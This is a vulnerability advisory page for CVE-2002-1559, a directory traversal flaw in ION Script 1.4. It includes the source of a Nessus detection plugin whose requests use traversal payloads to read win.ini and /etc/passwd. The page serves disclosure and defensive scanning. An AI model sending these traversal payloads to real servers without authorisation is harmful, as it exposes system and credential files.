Vulnerabilities > CVE-2002-1559 - Remote File Disclosure vulnerability in Research Systems Inc. ION Script 1.4

047910
CVSS 5.0 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
network
low complexity
research-systems-inc
nessus
exploit available
NVD
Published: 2003-03-31
Updated: 2008-09-05

Summary

Directory traversal vulnerability in ion-p.exe (aka ion-p) allows remote attackers to read arbitrary files via (1) C: (drive letter) or (2) .. (dot-dot) sequences in the page parameter.

Vulnerable Configurations

Part Description Count
Application
Research_Systems_Inc.
1

Exploit-Db

descriptionION Script 1.4 Remote File Disclosure Vulnerability. CVE-2002-1559. Webapps exploit for cgi platform
idEDB-ID:21979
last seen2016-02-02
modified2002-11-01
published2002-11-01
reporterZero X
sourcehttps://www.exploit-db.com/download/21979/
titleION Script 1.4 - Remote File Disclosure Vulnerability

Nessus

NASL familyCGI abuses
NASL idION_P.NASL
descriptionThe ion-p.exe exists on this web server. Some versions of this file are vulnerable to remote exploit. An attacker, exploiting this vulnerability, may be able to gain access to confidential data and/or escalate their privileges on the web server.
last seen2020-06-01
modified2020-06-02
plugin id11729
published2003-06-11
reporterThis script is Copyright (C) 2003-2018 John Lampe
sourcehttps://www.tenable.com/plugins/nessus/11729
titleION ion-p.exe page Parameter Traversal Arbitrary File Retrieval
code
#
# This script was written by John [email protected]
#
# See the Nessus Scripts License for details
#

# Changes by Tenable:
# - Revised plugin title (4/16/009)


include("compat.inc");

if (description)
{
 script_id(11729);
 script_version("1.25");
 script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
 script_cve_id("CVE-2002-1559");
 script_bugtraq_id(6091);

 script_name(english:"ION ion-p.exe page Parameter Traversal Arbitrary File Retrieval");
 script_summary(english:"Checks for the ion-p.exe file");

 script_set_attribute(attribute:"synopsis", value:
"The remote web server is hosting an application that is affected by
an information disclosure vulnerability.");
 script_set_attribute(attribute:"description", value:
"The ion-p.exe exists on this web server. Some versions of this file
are vulnerable to remote exploit. An attacker, exploiting this
vulnerability, may be able to gain access to confidential data and/or
escalate their privileges on the web server.");
 script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=103617461516386&w=2");
 script_set_attribute(attribute:"solution", value:
"There is no known solution at this time.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"plugin_publication_date", value:"2003/06/11");
 script_set_attribute(attribute:"vuln_publication_date", value:"2002/11/01");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();

 script_category(ACT_ATTACK);
 script_copyright(english:"This script is Copyright (C) 2003-2020 John Lampe");
 script_family(english:"CGI abuses");
 script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
 script_require_ports("Services/www", 80);
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}

#
# The script code starts here
#

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80, embedded:TRUE);

if(!get_port_state(port))exit(0);

flag = 0;
directory = "";

foreach dir (cgi_dirs()) {
	req = http_get(item: dir + "/ion-p.exe?page=c:\\winnt\\win.ini", port:port);
	res = http_keepalive_send_recv(port:port, data:req);
	if( res == NULL ) exit(0);

	if (egrep(pattern:".*\[fonts\].*", string:res, icase:TRUE)) {
			security_warning(port);
			exit(0);
		}

	req = http_get(item: dir + "/ion-p.exe?page=../../../../../etc/passwd", port:port);
	res = http_keepalive_send_recv(port:port, data:req);
	if (egrep(pattern:".*root:.*:0:[01]:.*", string:res))
	{
	 security_warning(port);
	 exit(0);
	}
}

References